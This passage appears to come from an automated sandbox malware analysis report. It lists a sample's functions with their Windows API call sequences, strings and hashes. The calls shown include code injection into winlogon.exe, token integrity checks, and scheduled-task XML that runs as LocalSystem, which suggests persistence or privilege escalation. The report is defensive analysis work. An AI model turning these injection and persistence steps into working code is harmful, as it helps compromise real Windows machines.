                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 00403717
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 0040371E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 00-->, xrefs: 0040383F
                                                                                                                                                                                                                • task%d, xrefs: 0040365C
                                                                                                                                                                                                                • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                                • <Actions , xrefs: 0040380A
                                                                                                                                                                                                                • p=5w, xrefs: 0040394B
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                                • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=5w$task%d
                                                                                                                                                                                                                • API String ID: 1601901853-2340070504
                                                                                                                                                                                                                • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                                • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                                Function 004018E0 Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 234memoryprocessCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                • API String ID: 3422789474-2746444292
                                                                                                                                                                                                                • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                                • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                                Function 00401670 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,00000000,?,7702DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7702DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?), ref: 004017D8
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                                • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                • API String ID: 3542510048-3024904723
                                                                                                                                                                                                                • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                                • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                                Function 00401CF0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                                • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                • String ID: .dll$kernel
                                                                                                                                                                                                                • API String ID: 2979424695-2375045364
                                                                                                                                                                                                                • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                                • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                                Function 004034C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                                • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                                • API String ID: 4133869067-1576788796
                                                                                                                                                                                                                • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                                • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                                Function 0043A650 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: VUUU
                                                                                                                                                                                                                • API String ID: 0-2040033107
                                                                                                                                                                                                                • Opcode ID: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                                • Instruction ID: 83c8b6d4ae9392d60502dd360fb7ca1817b1c3f4776dddc770d92cd40da689bc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FC1F571A4065647C728CF69C5902BAFBF1BF98310F08A12FD4D2D6B81E338E555CB55
                                                                                                                                                                                                                Function 00423970 Relevance: .8, Instructions: 833COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                                • Instruction ID: 49f4f21d9b48f79dac2c560b4f9f45e3af11d3fe5a8b8c575f21095663944224
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 466217302083668FE711CF349998AAB7BE4EF9B342F448559E881C7372DB35C949C799
                                                                                                                                                                                                                Function 00447EDD Relevance: .8, Instructions: 789COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 8be546a5801d80e10960c8fac69fe55b4532605c50e249de703d82068b70ae38
                                                                                                                                                                                                                • Instruction ID: 819080bdcba4aba2f410b402834f39c633db381555cbfe7eca53d93c247e6cbf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8be546a5801d80e10960c8fac69fe55b4532605c50e249de703d82068b70ae38
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6362AD70E00A269BDB0CCF55C8906EDB7B2FF84311F14826EC81667B84DB78A955DF94
                                                                                                                                                                                                                Function 004356D0 Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                                • Instruction ID: c7ae1df08a76fa61e3c99c46e8343ff6a04015de72be0cc750c2f716a6a279e4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F442D171900A499FDB14DFA8C880AEFBBF5EF4C308F14555EE446A7341D738A946CBA8
                                                                                                                                                                                                                Function 004460F0 Relevance: .5, Instructions: 504COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                                • Instruction ID: 296f88951ecf7cea7bff09f9537e53bf2d2ecc764958e0785ba560d75f276c2e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6112E5306017849FEB25CF18C5906AEBBF1BF46310F16855AE8E54B792C338ED46CB56
                                                                                                                                                                                                                Function 00445A20 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                                • Instruction ID: 373094f0e44d4ed5b4a76297d3e75846c5555569b6fb32489a2bef93388bd825
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C812D230A00B859FEF21CF18C590AAEB7F1FF95310F14855AE8A64B792C338AD46CB55
                                                                                                                                                                                                                Function 004467C0 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                                • Instruction ID: cfa054cb93e044cdae65f2de48f0eb828664dc1768648188419bb013471483e8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA12D530A057849FEB25CF18C490AAABBF1EF53314F15855EE8E54B391C338AD46CB66
                                                                                                                                                                                                                Function 00444790 Relevance: .5, Instructions: 494COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                                • Instruction ID: c484f8b887487c68eb1831faa77cd2835b2ef54b83a3a9b38c3ea20a6c7484b0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA12D430A017859FEB21CF18C58079ABBF1FF96310F19855AE8A59B381D338ED46CB65
                                                                                                                                                                                                                Function 00442340 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                                • Instruction ID: 9417f9ed4064ddd1c3f6edb80d8f66b01d291d1ab21ea86703028fde516e46eb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E02F530A007459FEB20CF28C6906AFB7F1FF41310F55855AF8A54B391D778A986CBA5
                                                                                                                                                                                                                Function 00442FA0 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
